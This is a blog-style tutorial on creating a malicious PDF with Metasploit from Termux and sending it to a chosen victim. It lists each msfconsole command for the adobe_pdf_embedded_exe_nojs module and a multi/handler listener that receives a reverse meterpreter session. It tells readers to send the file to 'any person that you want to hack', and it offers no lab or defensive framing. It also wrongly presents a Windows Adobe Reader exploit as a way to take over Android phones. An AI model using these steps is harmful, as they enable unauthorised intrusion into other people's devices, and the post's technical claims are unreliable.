Gameplay

3/Gameplay/grid-small

Hacking Android Using Metasploit via a PDF File

😀😀

Termux works as terminal for android 


Requirements :-

  1. Termux app( Download it from play store.

  2. Install Metasploit Framework in TermuX

  3. TermuX should be allowed to use External Storage (For this enter the command : “ termux-setup-storage ”).

  4. (Recommended not necessary) Use Hacker`s Keyboard 40 for entering commands in TermuX easily.

Whenever you have finished all prerequisites we are prepared to play out the hack. 

Hacking Android Using Metasploit through a PDF File :- 


😀 Stage 1 :- Launch Metasploit Console 

Above all else open Termux, on the off chance that you are on android or simply open your terminal if on Desktop. 

Enter the accompanying order to open Metasploit Console 

👉msfconsole 

On the off chance that this sort of screen shows up before you, at that point we are acceptable and if not there may be issue in establishment of metasploit.

Step 2 :- Creating the Evil PDF (Payload)

Type the commands given below or simply copy paste them one by one to create the PDF File.

👉use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

Then you have to set your Localhost. For this you will need your IP Address, to check your IP Address type

👉ifconfig

in new seesion on termux or in another terminal window. Now come to your metasploit console and set your Localhost like this –

👉set LHOST 192.168.0.0

Replace the IP Address given in above command by your own IP Address

Now its time to setup port for this enter this command –

👉set LPORT 4444

You are free to use any port you want like 4564, 8080 etc.

Now its time to generate the Evil PDF File do this by below command –

👉set filename MyDocument.pdf

Here, you are also free to use any name you want just put it in place of MyDocument but be sure to put .pdf at the end of its name.

Now the last command is for final creation of file do this by typing this command –

👉exploit

 

Now within a second a message will be displayed saying that your PDF File is created at any default location. First copy that PDF File to your either Internal or External storage like this

👉mv <fille_location> <new_location>

And now you are done with creation part. Send it to any person that you want to hack. As soon as he/she will open that pdf file you will get the metasploit session.

👉Step 3 :- Exploitation

First open your metasploit console by typing

👉msfconsole

and then start writing below mentioned command –

👉use exploit/multi/handler/

👉set LHOST <your_IP>

👉set LPORT 4444

👉exploit

 Note – Make sure to enter same IP and Port as you entered above in Step 2.

It will some time and then BOOM you will get meterpreter session. If such output appears then you got access to victim’s phone.


0 Comments:

Post a Comment